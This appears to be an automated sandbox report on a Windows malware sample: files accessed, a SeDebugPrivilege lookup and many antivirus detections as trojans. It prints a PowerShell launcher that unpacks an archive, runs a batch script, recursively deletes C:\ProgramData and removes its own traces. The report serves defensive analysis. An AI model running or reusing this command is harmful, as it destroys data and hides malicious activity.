file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013\Office 2013 Tools\Telemetry Log for Office 2013.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\한컴 사전.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Disk Cleanup.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HttpWatch Professional Edition\Automation Examples.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HttpWatch Professional Edition\HttpWatch Automation Reference.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\한글과컴퓨터\한컴오피스 한글 2010\한컴 사전.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\한글과컴퓨터\한컴오피스 한글 2010\한컴 타자연습.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\GameExplorer.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EditPlus.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Security Configuration Management.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013\Lync 2013.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sound Recorder.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE (x86).lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013\InfoPath Designer 2013.lnk
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip File Manager.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip Help.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Mobility Center.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Math Input Panel.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HttpWatch Professional Edition\HttpWatch Studio.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\System Restore.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Performance Monitor.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Resource Monitor.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013\SkyDrive Pro 2013.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Memory Diagnostics Tool.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Character Map.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013\Word 2013.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Data Sources (ODBC).lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\dfrgui.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Print Management.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013\Office 2013 Tools\Lync Recording Manager.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Create Recovery Disc.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013\OneNote 2013.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows PowerShell Modules.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013\Send to OneNote 2013.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk
cmdline powershell "(new-object -com shell.application).namespace('C:\ProgramData\').CopyHere((new-object -com shell.application).namespace('C:\ProgramData\ctf635.zip').Items(),0x14);Invoke-Item C:\ProgramData\\glasses.cmd.ADS.Run-me-first.cmd;Start-Sleep -s 8;Remove-Item C:\ProgramData\ -Recurse;Remove-Item C:\ProgramData\ctf635.zip;Invoke-Item C:\ProgramData\glasses.cmd;"
cmdline C:\Windows\system32\cmd.exe /c powershell "(new-object -com shell.application).namespace('C:\ProgramData\').CopyHere((new-object -com shell.application).namespace('C:\ProgramData\ctf635.zip').Items(),0x14);Invoke-Item C:\ProgramData\\glasses.cmd.ADS.Run-me-first.cmd;Start-Sleep -s 8;Remove-Item C:\ProgramData\ -Recurse;Remove-Item C:\ProgramData\ctf635.zip;Invoke-Item C:\ProgramData\glasses.cmd;"
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
file C:\ProgramData\Microsoft\Microsoft Antimalware\Network Inspection System\Support
file C:\ProgramData\Microsoft\Microsoft Antimalware\Network Inspection System\Support\NisLog.txt
file C:\ProgramData\Microsoft\Microsoft Antimalware
file C:\ProgramData\Microsoft\Microsoft Antimalware\Network Inspection System
file C:\ProgramData\Microsoft\Microsoft Security Client\Support\EppSetup.etl
file C:\ProgramData\Microsoft\Microsoft Security Client\Support\EppSetupResult.ini
file C:\ProgramData\Microsoft\Microsoft Security Client\Support\MSSecurityClient_Setup_4.10.209.0_epp_Install.log
file C:\ProgramData\Microsoft\Microsoft Security Client
file C:\ProgramData\Microsoft\Microsoft Security Client\Support\Application.etl
file C:\ProgramData\Microsoft\Microsoft Security Client\Support\EppSetup.log
file C:\ProgramData\Microsoft\Microsoft Security Client\Support\MSSecurityClient_Setup_4.10.209.0_epp_Uninstall.log
file C:\ProgramData\Microsoft\Microsoft Security Client\Support
file C:\ProgramData\Microsoft\Microsoft Security Client\Support\EppOobe.etl
file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.000
file C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_d473a376adfb18a7b165c5e3c26de43cd8bccb_cab_073df2c7\Report.wer
file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.000
file C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_7.6.7600.320_1d6cd9ddc91cff4d29b76c40ebddbb60b159a6b_cab_0319bbd9\Report.wer
file c:\users\test22\appdata\roaming\microsoft\windows\recent\customdestinations\d93f411851d7c929.customdestinations-ms
file C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_Microsoft Securi_b7457172fa7bd04afd863d96dac0989119b6478a_03083f6b\Report.wer
file C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\ko-KR\fyi.cov
file C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_Setup.exe_a4ea52a2fe5447f6ad91bfd7091629bc48c5c9a_cab_0eb06599\MpWppTracing-02022018-102425-00000003-ffffffff.bin
file C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_Microsoft Securi_b7457172fa7bd04afd863d96dac0989119b6478a_0365a90e\Report.wer
file C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov
file C:\ProgramData\Microsoft\RAC\StateData\RacDatabase.sdf
file C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov
file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010002.dir
file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS0000F.log
file C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\ko-KR\confident.cov
file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010008.wid
file C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_Microsoft Securi_b7457172fa7bd04afd863d96dac0989119b6478a_cab_033f06aa\Report.wer
file C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat
file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.000
file C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\ko-KR\generic.cov
file C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_Microsoft Securi_b7457172fa7bd04afd863d96dac0989119b6478a_030d2d87\Report.wer
file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.001
file C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\Cache\cache.dat
file C:\ProgramData\Microsoft\Microsoft Security Client\Support\EppOobe.etl
file C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_Microsoft Securi_b7457172fa7bd04afd863d96dac0989119b6478a_03172cae\Report.wer
file C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_7.5.7601.17514_cebd3d731ee9946135ceb4a55683a7322368360_cab_0c543562\Report.wer
file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010004.wid
file C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_Microsoft Securi_b7457172fa7bd04afd863d96dac0989119b6478a_036fb86d\Report.wer
file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.001
file C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db
file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010003.wid
file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010004.ci
file C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov
file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010005.ci
file C:\ProgramData\Microsoft\Microsoft Security Client\Support\EppSetup.etl
file C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_7f3d4ec7de8094372877468cdbf76ae6d341588_cab_04aa2abf\Report.wer
file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\MSSres00001.jrs
file C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_Setup.exe_a4ea52a2fe5447f6ad91bfd7091629bc48c5c9a_cab_0eb06599\EppSetup.etl
file C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\ko-KR\urgent.cov
file C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_Setup.exe_a4ea52a2fe5447f6ad91bfd7091629bc48c5c9a_cab_0eb06599\Report.wer
file C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat
file C:\ProgramData\Microsoft\Windows\Caches\{AC5EA722-96E4-47AB-A4BF-6C93460BE9F8}.2.ver0x0000000000000003.db
file C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_Microsoft Securi_b7457172fa7bd04afd863d96dac0989119b6478a_030a5470\Report.wer
file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.000
file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS.chk
file C:\ProgramData\Microsoft\Microsoft Security Client\Support\Application.etl
file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0002.001
file C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_Microsoft Securi_b7457172fa7bd04afd863d96dac0989119b6478a_0330e96d\Report.wer
file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010010.wid
file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\SETTINGS.DIA
file C:\ProgramData\Oracle\Java\javapath_target_280671\javaw.exe
file C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\WWINTL.REST.trx_dll
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 2.7\Python Manuals.lnk
file C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013\InfoPath Filler 2013.lnk
file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS0000F.log
file C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{CE30CEB1-2E0C-4A02-B591-7C0F3A5A790A}\mpasbase.vdm
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sidebar.lnk
file C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\WWINTL.DLL.trx_dll
file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010004.ci
file C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk
file C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\XLINTL32.REST.trx_dll
file C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_pref.ico
file C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\PUB6INTL.REST.trx_dll
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Remote Assistance.lnk
file C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\PUBWZINT.REST.trx_dll
file C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp
file C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp
file C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\XLSLICER.DLL.trx_dll
file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010011.dir
file C:\ProgramData\KMSAutoS\bin\driver\x64WDV\WinDivert.sys
file C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_Microsoft Securi_b7457172fa7bd04afd863d96dac0989119b6478a_0365a90e\Report.wer
file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\MSSres00002.jrs
file C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{CE30CEB1-2E0C-4A02-B591-7C0F3A5A790A}\mpengine.dll
file C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\STINTL.DLL.trx_dll
file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010009.ci
file C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\PUB6INTL.REST.trx_dll
file C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_Setup.exe_a4ea52a2fe5447f6ad91bfd7091629bc48c5c9a_cab_0eb06599\EppSetup.etl
file C:\ProgramData\KMSAutoS\bin\driver\x64TAP1\ptun0901.sys
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Mobility Center.lnk
file C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp
file C:\ProgramData\KMSAutoS\bin\KMSSS.log
file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010002.dir
file C:\ProgramData\Package Cache\{EF1EC6A9-17DE-3DA9-B040-686A1E8A8B04}v14.0.24215\packages\vcRuntimeAdditional_amd64\cab1.cab
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\System Restore.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Character Map.lnk
file C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\OUTLLIBR.REST.trx_dll
file C:\ProgramData\KMSAutoS\kmsauto.ini
file C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp
file C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_Microsoft Securi_b7457172fa7bd04afd863d96dac0989119b6478a_036fb86d\Report.wer
file C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\dfrgui.lnk
file C:\ProgramData\Microsoft\IdentityCRL\ppcrlconfig.dll
file C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_Microsoft Securi_b7457172fa7bd04afd863d96dac0989119b6478a_03083f6b\Report.wer
file C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_d473a376adfb18a7b165c5e3c26de43cd8bccb_cab_073df2c7\Report.wer
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013\Office 2013 Tools\Telemetry Log for Office 2013.lnk
file C:\ProgramData\Microsoft\OFFICE\MySharePoints.ico
file C:\ProgramData\Oracle\Java\.oracle_jre_usage\cce3fe3b0d8d805f.timestamp
file C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_Setup.exe_a4ea52a2fe5447f6ad91bfd7091629bc48c5c9a_cab_0eb06599\EppSetupResult.ini
Lionic Trojan.Win32.Generic.4!c
MicroWorld-eScan Trojan.GenericKD.47287627
FireEye Generic.mg.d31c7d2c2cfa9b2b
McAfee Artemis!D31C7D2C2CFA
Sangfor Suspicious.Win32.Save.a
Alibaba Trojan:Win32/Generic.c0e07b84
Cyren W32/Zusy.HV.gen!Eldorado
ESET-NOD32 a variant of Generik.BHGPUCE
TrendMicro-HouseCall TROJ_FRS.0NA103JV21
Paloalto generic.ml
BitDefender Trojan.GenericKD.47287627
Avast Win32:Trojan-gen
Ad-Aware Trojan.GenericKD.47287627
Comodo Malware@#2fah5urz6fmg9
TrendMicro TROJ_FRS.0NA103JV21
McAfee-GW-Edition BehavesLike.Win32.Generic.lm
SentinelOne Static AI - Suspicious PE
Emsisoft Trojan.GenericKD.47287627 (B)
APEX Malicious
Gridinsoft Ransom.Win32.Sabsik.sa
Microsoft Trojan:Win32/Sabsik.FL.B!ml
GData Win32.Trojan.Agent.SLP0E2
Cynet Malicious (score: 100)
ALYac Trojan.GenericKD.47287627
MAX malware (ai score=83)
Ikarus Trojan.SuspectCRC
MaxSecure Trojan.Malware.300983.susgen
Fortinet W32/Small.BIR!tr.dldr
AVG Win32:Trojan-gen